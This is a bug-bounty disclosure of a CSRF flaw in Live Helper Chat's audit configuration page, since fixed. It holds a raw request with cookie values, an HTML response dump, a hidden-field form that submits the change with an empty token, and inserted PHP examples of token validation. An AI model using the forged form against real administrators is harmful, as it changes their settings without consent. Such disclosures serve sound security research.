Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat

Valid

Reported on

Jan 13th 2022


Description

A CSRF issue exists in the audit configuration page under settings. The server performs no CSRF token validation: if the CSRF token is removed and the token field is left empty, the action is still performed.
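A server-side check that rejects this request, shown as an added example and not Live Helper Chat's code or its actual fix: the function names and the `csrf_token` session key are assumptions, and only the `csfr_token` form field and the sample request body come from this report. Missing and empty tokens are rejected before the comparison because `hash_equals('', '')` returns true, so a session without a token would otherwise match an empty field.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical helpers, not Live Helper Chat's own code.

// Issue (or reuse) the per-session token that the form embeds in its hidden field.
// The 'csrf_token' session key is an assumption made for this example.
function issueCsrfToken(array &$session): string
{
    $current = $session['csrf_token'] ?? null;
    if (!is_string($current) || $current === '') {
        $session['csrf_token'] = bin2hex(random_bytes(16)); // 32 hex characters
    }
    return $session['csrf_token'];
}

// Return true only when the submitted token is a non-empty string equal to the session token.
function isValidCsrfToken(array $session, array $post): bool
{
    $expected  = $session['csrf_token'] ?? null;
    $submitted = $post['csfr_token'] ?? null; // field name as it appears in the report

    // A missing field, or an array sent as csfr_token[]=x, is not a token.
    if (!is_string($expected) || !is_string($submitted)) {
        return false;
    }
    // Empty on either side is a failure: hash_equals('', '') would return true.
    if ($expected === '' || $submitted === '') {
        return false;
    }
    // Constant-time comparison of the two strings.
    return hash_equals($expected, $submitted);
}

// Hypothetical handler for the audit configuration form; returns the HTTP status.
function handleAuditConfiguration(string $method, array $session, array $post): int
{
    if ($method !== 'POST' || !isset($post['StoreOptions'])) {
        return 200; // plain page view, nothing is stored
    }
    if (!isValidCsrfToken($session, $post)) {
        return 403; // refuse the state change
    }
    // The settings (days_log, log_js, ...) would be stored here.
    return 200;
}

// Parse an application/x-www-form-urlencoded body into an array, as PHP does for $_POST.
function parseBody(string $body): array
{
    $post = [];
    parse_str($body, $post);
    return $post;
}

// Constructed session for the demonstration.
$session = [];
$token = issueCsrfToken($session);

// Constructed request bodies; the first is the body from this report.
$cases = [
    'empty token (report body)' => 'csfr_token=&days_log=90&log_js=on&StoreOptions=Save',
    'token field missing'       => 'days_log=90&log_js=on&StoreOptions=Save',
    'wrong token'               => 'csfr_token=' . str_repeat('0', 32) . '&days_log=90&StoreOptions=Save',
    'token sent as array'       => 'csfr_token[]=' . $token . '&days_log=90&StoreOptions=Save',
    'valid token'               => 'csfr_token=' . $token . '&days_log=90&log_js=on&StoreOptions=Save',
];

foreach ($cases as $label => $body) {
    $status = handleAuditConfiguration('POST', $session, parseBody($body));
    printf("%-28s HTTP %d\n", $label, $status);
}

// Edge case: a session that never received a token must not accept an empty field.
$status = handleAuditConfiguration('POST', [], parseBody($cases['empty token (report body)']));
printf("%-28s HTTP %d\n", 'no session token, empty field', $status);
```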

Proof of Concept

Request

POST /site_admin/audit/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/audit/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=nq51ir4qicpnju1bdmqjitcuaj
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

csfr_token=&days_log=90&log_js=on&StoreOptions=Save

In the above request, you can see that I have removed the CSRF token, and the server still accepts this request and performs the desired action.

Successful Response


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 10:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Cache-Control: nocache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 02 Jan 1990 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 47652

<!DOCTYPE html><html  lang="en" dir="" ng-app="lhcApp"><head><title ng-non-bindable>Options &laquo; System configuration &laquo; Live Helper Chat - live support</title>
[...]
<h1 class="attr-header">Audit Configuration</h1>
<form action="" method="post" ng-non-bindable>
<input type="hidden" name="csfr_token" value="ddd6453b3a4966fd49c28edd5975617b" />
<div role="alert" class="alert alert-success alert-dismissible fade show"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>Settings updated</div>
<div class="form-group"><label>How many days keep log?</label><input type="text" class="form-control" name="days_log" value="90" /></div>
<div class="form-group"><label><input type="checkbox" name="log_js" checked value="on" /> Log javascript errors</label></div>
[...]
<input type="submit" class="btn btn-secondary" name="StoreOptions" value="Save" /></form>
[...]
class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limita" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','loc_dsc','loc_asc',true)"><i title="Location" class="material-icons">&#xE0C8;</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'loc_dsc')}" title="Sort by location" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'loc_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' ? 'trending_up' : 'trending_down'}}</i></a>&nbsp;&nbsp;&nbsp;<a ng-click="lhc.toggleWidgetSort('active_chats_sort','u_dsc','u_asc',true)"><i title="Visitor" class="material-icons">face</i><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'u_dsc')}" title="Sort by visitor nick" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'u_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' ? 
'trending_up' : 'trending_down'}}</i></a></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','lmt_dsc','lmt_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'lmt_dsc')}" title="Sort by last message time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'lmt_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' ? 'trending_up' : 'trending_down'}}</i></a><a ng-click="lhc.toggleWidgetSort('active_chats_sort','id_dsc','id_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'id_dsc')}" title="Sort by chat start time" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'id_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','op_dsc','op_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'op_dsc')}" title="Sort by operator" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'op_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a ng-click="lhc.toggleWidgetSort('active_chats_sort','dep_dsc','dep_asc',true)"><i ng-class="{'text-muted' : (lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' && lhc.toggleWidgetData['active_chats_sort'] != 'dep_dsc')}" title="Sort by department" class="material-icons">{{lhc.toggleWidgetData['active_chats_sort'] == 'dep_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' ? 
'trending_up' : 'trending_down'}}</i></a></th></tr></thead><tr ng-repeat="chat in active_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><i title="Has unread messages" ng-if="chat.hum" class="material-icons text-danger">feedback</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="Chat started at - {{chat.time_created_front}}"><span class="material-icons text-success" title="Receive or send indicator and time since it happened" ng-class="{'text-danger' : chat.pnd_rsp}"}>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.last_msg_time_front ? chat.last_msg_time_front : '&#x2709;'}}</div></td><td><div class="abbr-list" title="{{chat.n_off_full}} | {{chat.plain_user_name}}">{{chat.n_office}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? 
' | '+chat.product_name : ''}}"><a class="text-primary" ng-click="lhc.openModal('statistic/departmentstats/'+chat.dep_id,$event)"><i class="material-icons">donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div ng-if="active_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div></div><div class="card-header" ng-if="unread_chats.list.length > 0"><a class="title-card-header" href="/site_admin/chat/list/(hum)/1"><i class="material-icons chat-unread">chat</i>Unread messages ({{unread_chats.list.length}}{{unread_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleList('unread_chats_expanded')" class="fs24 float-right material-icons exp-cntr">{{unread_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="unread_chats_expanded == true" id="right-unread-chats"><table class="table table-sm mb-0 table-small table-fixed list-chat-table" ng-if="unread_chats.list.length > 0"><thead><tr><th width="50%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="30%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in unread_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a ng-click="lhc.previewChat(chat.id,$event)" 
class="material-icons">info_outline</a> {{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.">{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table><div ng-if="unread_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Nothing found...</div></div><div ng-if="bot_chats" class="" data-panel-id="bot_chats" ng-init="lhc.getToggleWidget('botc_widget_exp');lhc.getToggleWidgetSort('bot_chats_sort')"><div class="card-header"><i class="material-icons mr-0 action-image" onclick="return lhc.revealModal({'url':WWW_DIR_JAVASCRIPT +'genericbot/notifications'})">settings_applications</i><a class="title-card-header" href="/site_admin/chat/list/(chat_status_ids)/5"><i class="material-icons chat-active">android</i> Bot chats ({{bot_chats.list.length}}{{bot_chats.list.length == lhc.limitb ? '+' : ''}})</a><a title="collapse/expand" ng-click="lhc.toggleWidget('botc_widget_exp')" class="fs24 float-right material-icons exp-cntr">{{lhc.toggleWidgetData['botc_widget_exp'] == false ? 'expand_less' : 'expand_more'}}</a></div><div ng-if="lhc.toggleWidgetData['botc_widget_exp'] !== true"><div class="p-2"><div class="row"><div class="col-10 pr-0"><div class="btn-group btn-block btn-block-department"><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.botd.length == 0 ? "All departments" : (lhc.botd.length == 1 && true ? 
lhc.botdNames.join(", ") : '['+lhc.botd.length+'] '+'departments')}}</button><ul class="dropdown-menu" role="menu"><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_hide_hidden"> Hide hidden</label></li><li class="border-bottom"><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('botd',true)" type="checkbox" ng-model="lhc.botd_hide_disabled"> Hide disabled</label></li><li ng-repeat="product in lhc.userProductNames" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_products" checklist-change="lhc.productChanged('botd_products')" checklist-value="product.id"><i class="material-icons">&#xE8CC;</i>{{product.name}}</label></li><li ng-show="lhc.userProductNames.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartmentsGroups" data-stopPropagation="true"><label><input type="checkbox" checklist-model="lhc.botd_dpgroups" checklist-change="lhc.productChanged('botd_dpgroups')" checklist-value="department.id"><i title="Department group" class="material-icons">&#xE84F;</i>{{department.name}}</label></li><li ng-show="lhc.userDepartmentsGroups.length > 0" class="border-bottom"></li><li ng-repeat="department in lhc.userDepartments" data-stopPropagation="true" ng-hide="( (lhc.botd_only_explicit_online == true && department.oexp == false) || (lhc.botd_hide_hidden == true && department.hidden == true) || (lhc.botd_hide_disabled == true && department.disabled == true) || (lhc.botd_only_online == true && 
department.ogen == false))"><label><input type="checkbox" checklist-model="lhc.botd" checklist-change="lhc.departmentChanged('botd')" checklist-value="department.id"><i title="Department" class="material-icons">home</i>{{department.name}}</label></li></ul></div></div><div class="col-2"><select class="form-control form-control-sm btn-light" ng-model="lhc.limitb" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div ng-if="bot_chats.list.length > 0" class="panel-list"><table class="table table-sm mb-0 table-small table-fixed list-chat-table"><thead><tr><th width="40%"><i title="Visitor" class="material-icons">face</i></th><th width="20%" ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><i ng-if="column.icon !== ''" class="material-icons">{{column.icon}}</i>{{column.name}}</th><th width="25%"><i title="Time ago" class="material-icons">access_time</i></th><th width="20%"><i title="Department" class="material-icons">home</i></th></tr></thead><tr ng-repeat="chat in bot_chats.list track by chat.id" ng-click="lhc.startChat(chat.id,chat.nick)" ng-class="{'user-away-row': chat.user_status_front == 2, 'user-online-row': !chat.user_status_front}"><td><div class="abbr-list"><span ng-if="chat.country_code != undefined"><img ng-src="/design/defaulttheme/images/flags/{{chat.country_code}}.png" alt="{{chat.country_name}}" title="{{chat.country_name}}" />&nbsp;</span><a title="[{{chat.id}}] {{chat.time_created_front}}" ng-click="lhc.previewChat(chat.id, $event)" class="material-icons">info_outline</a><i class="material-icons" title="Offline request" ng-show="chat.status_sub == 7">mail</i><span ng-if="chat.status_sub == 100"><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" />&nbsp;</span><span title="Number of messages by 
user">[{{chat.msg_v || 0}}]</span>&nbsp;<i title="More than {{lhc.bot_st.msg_nm}} user messages" ng-show="chat.msg_v > lhc.bot_st.msg_nm" class="material-icons text-warning">whatshot</i><i ng-if="chat.aicons && (lhc.excludeIcons.length == 0 || lhc.excludeIcons.indexOf(icon.i) === -1)" class="material-icons" ng-style="{'color': icon.c ? icon.c : '#6c757d'}" title="{{icon.t ? icon.t : icon.i}}" ng-repeat="icon in chat.aicons track by $index">{{icon.i || icon}}</i>{{chat.nick}}</div></td><td ng-repeat="column in lhc.additionalColumns" ng-if="column.cenabl == true"><div class="abbr-list" ng-repeat="val in column.items">{{chat[val]}}&nbsp;</div></td><td><div class="abbr-list" title="{{chat.time_created_front}}">{{chat.time_created_front}}</div></td><td><div class="abbr-list" title="{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}">{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div ng-if="bot_chats.list.length == 0" class="m-1 alert alert-light"><i class="material-icons">search</i>Bot chats will appear here....</div></div></div></div></div></div></div></div><div class="p-1 border-top" translate="no"><p class="float-right small"><a target="_blank" rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat &copy; 2022</a></p>
<p class="small"><a rel="noreferrer" href="http://livehelperchat.com">Live Helper Chat</a></p>
</div><script type="text/javascript" src="/design/defaulttheme/js/js_static/55ece73a8d637ed105f7df02bf7597c8.js?1641801573"></script></body></html>

POC

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.livehelperchat.com/site_admin/audit/configuration" method="POST">
      <input type="hidden" name="csfr&#95;token" value="" />
      <input type="hidden" name="days&#95;log" value="90" />
      <input type="hidden" name="log&#95;js" value="on" />
      <input type="hidden" name="StoreOptions" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability can be used to trick the admin into changing the audit log configuration.
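A server-side check that rejects the request shown above, placed next to a handler that behaves as the report describes. This is an added example, not Live Helper Chat's code or the merged fix: the function names and the `$session` array layout are hypothetical, the session token is constructed, and the request body is the one from the report.

```php
<?php
declare(strict_types=1);
// Added example: function names and the $session layout are hypothetical.

/** True only for a non-empty submitted token that equals the session token. */
function csrfTokenIsValid(array $session, array $post, string $field = 'csfr_token'): bool
{
    $expected  = $session['csrf_token'] ?? '';
    $submitted = $post[$field] ?? '';
    // csfr_token[]=x parses to an array; only strings may reach hash_equals().
    if (!is_string($expected) || !is_string($submitted)) {
        return false;
    }
    // hash_equals('', '') is true, so an empty field must be rejected first,
    // otherwise it would match a session that has no token stored yet.
    if ($expected === '' || $submitted === '') {
        return false;
    }
    return hash_equals($expected, $submitted);
}

function applyAuditOptions(array $post, array &$config): void
{
    $config['days_log'] = (int) ($post['days_log'] ?? 0);
    $config['log_js']   = isset($post['log_js']);
}

/** Behaviour described in the report: the token field is never inspected. */
function storeAuditOptionsUnchecked(array $post, array &$config): bool
{
    if (!isset($post['StoreOptions'])) {
        return false;
    }
    applyAuditOptions($post, $config);
    return true;
}

/** Hardened form: the token is verified before any setting changes. */
function storeAuditOptionsChecked(array $session, array $post, array &$config): bool
{
    if (!isset($post['StoreOptions']) || !csrfTokenIsValid($session, $post)) {
        return false;
    }
    applyAuditOptions($post, $config);
    return true;
}

// Request body from the report: token field present but empty.
parse_str('csfr_token=&days_log=90&log_js=on&StoreOptions=Save', $forged);
// Constructed session token (32 hex characters, generated server-side).
$session = ['csrf_token' => bin2hex(random_bytes(16))];
$legit   = ['csfr_token' => $session['csrf_token']] + $forged;
$config  = ['days_log' => 30, 'log_js' => false];

$results = [
    'unchecked handler, empty token'        => storeAuditOptionsUnchecked($forged, $config),
    'checked handler, empty token'          => storeAuditOptionsChecked($session, $forged, $config),
    'checked handler, session has no token' => storeAuditOptionsChecked([], $forged, $config),
    'checked handler, matching token'       => storeAuditOptionsChecked($session, $legit, $config),
];
foreach ($results as $case => $accepted) {
    printf("%-40s %s\n", $case, $accepted ? 'accepted' : 'rejected');
}
```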

We are processing your report and will contact the livehelperchat team within 24 hours. 15 days ago
Remigijus Kiminas validated this vulnerability 15 days ago
shubh123-tri has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on f59ffb 15 days ago
The fix bounty has been dropped